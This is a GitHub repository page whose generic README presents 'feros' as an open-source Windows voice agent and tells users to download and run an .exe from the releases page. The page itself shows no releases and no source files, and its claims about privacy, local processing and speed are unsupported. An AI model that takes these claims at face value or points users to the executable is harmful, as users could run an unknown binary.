Skip to content

plain-sleepydick853/feros

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

🎙️ feros - Build your own voice agent today

Download feros

feros is an open-source system that lets you build and run voice-controlled artificial intelligence. You control the hardware and software on your own computer. The system uses a fast engine written in Rust to process speech. It responds to your voice commands in under one second.

⚙️ System Requirements

Your computer needs specific hardware and software to run this tool well.

  • Operating System: Windows 10 or Windows 11.
  • Processor: A modern dual-core chip or better.
  • Memory: 8 gigabytes of RAM.
  • Storage: 2 gigabytes of free disk space.
  • Audio: A working USB or built-in microphone and speakers.
  • Network: A stable internet connection for the initial setup.

📥 How to Install

Follow these steps to get the software on your computer.

  1. Go to the release page to find the latest version.
  2. Look for the file ending in .exe under the Assets section.
  3. Click the filename to start the download.
  4. Save the file to your Downloads folder.
  5. Double-click the file to start the installer.
  6. Follow the on-screen prompts to finish the setup.

🛠️ Configuration

After you install the software, you need to set your preferences. The program opens a screen where you select your microphone and speaker devices.

  1. Open the feros application from your Windows Start menu.
  2. Click the gear icon to open settings.
  3. Choose your input device. This is the microphone the agent uses to hear you.
  4. Choose your output device. This is where the agent speaks to you.
  5. Click Save.

🤖 Using the Agent

The agent listens for your input. When you talk, the system captures your audio and sends it to the processing engine. The engine converts speech to text, interprets your command, and generates a reply.

You can use the agent for several tasks:

  • Managing your calendar and schedule.
  • Controlling smart home devices.
  • Dictating notes or emails.
  • Getting answers to general knowledge questions.

The system processes these commands locally. Your audio data stays on your machine unless you configure it to connect to an external cloud service.

💡 Troubleshooting

If you have trouble with the software, try these steps.

  • No sound? Check if you muted your microphone in Windows settings.
  • Slow responses? Close other demanding programs like video editors or web browsers.
  • Errors during launch? Ensure you have the latest updates for Windows installed.
  • Agent not hearing you? Check that you selected the correct microphone in the settings menu.

🔑 Privacy and Data

You own your data. feros runs on your hardware. You do not need an account to use the basic features. The software does not track your behavior or sell your information. If you want to use advanced AI models, you may need to provide an API key. You enter this key inside the settings menu. The program encrypts this key and stores it only on your computer.

📁 Storage Locations

The application creates a folder in your User directory to store settings and history. If you need to reset the application, you can delete this folder.

  1. Press Windows Key + R.
  2. Type %appdata% and hit Enter.
  3. Locate the folder named feros.
  4. You can back up this folder if you want to keep your configuration settings safe.

🚀 Updating the Software

Check the release page periodically for updates. New versions include performance gains and security fixes.

  1. Download the new installer from the link above.
  2. Run the installer over the existing version.
  3. The installer replaces the old files while keeping your personal settings intact.

🌐 Connecting to Other Tools

The system supports standard web requests. You can link feros to your own automation tools. Use the integration menu to provide the web addresses of your other services. This allows the agent to trigger actions in other apps you use.

For example, you can tell the agent to send a message to a group chat or update a spreadsheet by calling a specific web address. You define these links in the configuration file.

🧩 Modifying Behaviors

You can change how the agent responds. The system allows you to upload custom instructions. You can give the agent a specific personality or focus it on a single task, such as technical support or language practice.

Create a text file containing your instructions and load it through the interface. The agent reads this file and updates its behavior instantly.

📦 Uninstalling

If you no longer need the software, remove it through your Windows settings.

  1. Open the Start menu and select Settings.
  2. Go to Apps.
  3. Find feros in the list.
  4. Click Uninstall and confirm your choice.
  5. The uninstaller removes the executable files. Your data folder remains in case you want to reinstall later.

Releases

No releases published

Packages

 
 
 

Contributors